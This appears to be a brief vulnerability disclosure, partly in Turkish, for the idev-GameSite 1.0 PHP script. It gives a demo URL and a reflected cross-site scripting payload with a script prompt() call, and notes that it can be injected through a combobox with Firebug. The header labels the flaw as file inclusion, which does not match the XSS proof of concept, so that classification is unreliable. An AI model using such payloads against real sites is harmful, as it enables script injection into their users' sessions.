------------------- header data start ------------------- >

#############################################################

# Application Name : idev-GameSite 1.0

# Vulnerable Type : File Inclusion
# Infection : Server bilgileri ele geçirilebilinir.
# Fixed : Zararli Karakterler Filitrelenmelidir.
# Author : Butterfly Effect
# Price : $29.95

# Demo :http://idevspot.com/demos/idev-gamesite/index.php

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

http://idevspot.com/demos/idev-gamesite/Action-Arcade?show=1&page=browse&category=1&mode=


’()&%1<script>prompt(989314)</script>

< -- bug code end of -- >


Not : Firefox’un firebug eklentisiyle combobox’a ’()&%1<script>prompt(989314)</script> show butonuna basarsaniz XSS ’yi görürsünüz